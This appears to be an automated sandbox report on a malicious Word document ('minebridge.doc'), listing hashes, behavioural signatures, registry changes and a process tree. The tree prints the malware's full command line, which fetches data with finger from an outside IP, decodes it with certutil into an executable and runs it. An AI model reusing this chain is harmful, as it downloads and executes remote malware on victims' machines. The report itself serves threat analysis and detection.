Analysis
- max time kernel: 120s
- max time network: 119s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 16-01-2021 06:55
Static task: static1
Behavioral task: behavioral1
- Sample: 321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: 321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc
- Resource: win10v20201028
General
- Target: 321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc
- Size: 118KB
- MD5: f95643710018c437754b8a11cc943348
- SHA1: f590e1b6a80cf3e8360388382eabb04b3e247b78
- SHA256: 321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67
- SHA512: f39abfd51e62f145376b5587cd515072e01740e10e967f401057c00403017c6754264bed08f8bef819829a80762ce572b40463b7854db33a961ff2e624509fba
Malware Config
Signatures
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
- Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process (pid: 1648, pid_target: 1468, process: cmd.exe)
Drops file in Windows directory (1 IoC)
Processes:
- File opened for modification: C:\Windows\Debug\WIA\wiatrace.log (process: WINWORD.EXE)
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings (9 IoCs)
Processes:
- Set value (str): \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" (process: WINWORD.EXE)
- Key created: \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt (process: WINWORD.EXE)
- Key created: \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel (process: WINWORD.EXE)
- Set value (str): \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" (process: WINWORD.EXE)
- Key created: \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar (process: WINWORD.EXE)
- Key created: \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote (process: WINWORD.EXE)
- Set value (str): \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" (process: WINWORD.EXE)
- Set value (int): \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" (process: WINWORD.EXE)
- Set value (int): \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" (process: WINWORD.EXE)
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
- pid 932, process WINWORD.EXE
Suspicious use of SetWindowsHookEx (2 IoCs)
Processes:
- pid 932, process WINWORD.EXE
- pid 932, process WINWORD.EXE
Suspicious use of WriteProcessMemory (10 IoCs)
Processes:
- PID 932 wrote to memory of 1996 (pid: 932, process: WINWORD.EXE, target process: splwow64.exe)
- PID 932 wrote to memory of 1996 (pid: 932, process: WINWORD.EXE, target process: splwow64.exe)
- PID 932 wrote to memory of 1996 (pid: 932, process: WINWORD.EXE, target process: splwow64.exe)
- PID 932 wrote to memory of 1996 (pid: 932, process: WINWORD.EXE, target process: splwow64.exe)
- PID 1648 wrote to memory of 1060 (pid: 1648, process: cmd.exe, target process: finger.exe)
- PID 1648 wrote to memory of 1060 (pid: 1648, process: cmd.exe, target process: finger.exe)
- PID 1648 wrote to memory of 1060 (pid: 1648, process: cmd.exe, target process: finger.exe)
- PID 1648 wrote to memory of 2020 (pid: 1648, process: cmd.exe, target process: certutil.exe)
- PID 1648 wrote to memory of 2020 (pid: 1648, process: cmd.exe, target process: certutil.exe)
- PID 1648 wrote to memory of 2020 (pid: 1648, process: cmd.exe, target process: certutil.exe)
Processes
- C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (level 1)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc"
  Signatures:
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\splwow64.exe (level 2)
    Command line: C:\Windows\splwow64.exe 12288
- C:\Windows\system32\cmd.exe (level 1)
  Command line: cmd /C finger nc20@184.164.146.102 > %appdata%\vUCooUr >> %appdata%\vUCooUr1 && certutil -decode %appdata%\vUCooUr1 %appdata%\vUCooUr.exe &&cmd /C del %appdata%\vUCooUr1 && %appdata%\vUCooUr.exe
  Signatures:
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\finger.exe (level 2)
    Command line: finger nc20@184.164.146.102
  - C:\Windows\system32\certutil.exe (level 2)
    Command line: certutil -decode C:\Users\Admin\AppData\Roaming\vUCooUr1 C:\Users\Admin\AppData\Roaming\vUCooUr.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Roaming\vUCooUr1
  MD5: cf1c89f9c31ba34c4a84c26e13f9c6a2
  SHA1: 3ffe882b0b0df619e046d6b589438b5652fb9b17
  SHA256: 29d9868db914315b380fa6629d7205fe2c00f8186c4164a08fd30c4fe449793c
  SHA512: 5b1d2c81ac636a9ead6b99fa510ad9a8b604072c9a82a7b3d2e1e6f4c0d82556b4ab1de761fd8f0798b871e8b8f3a4bf7345e9625f11cbfe653857e00dc84aab
- memory/932-3-0x00000000008F3000-0x00000000008F5000-memory.dmp (filesize: 8KB)
- memory/932-4-0x00000000008F5000-0x00000000008F9000-memory.dmp (filesize: 16KB)
- memory/1060-5-0x0000000000000000-mapping.dmp
- memory/1996-2-0x0000000000000000-mapping.dmp
- memory/2020-6-0x0000000000000000-mapping.dmp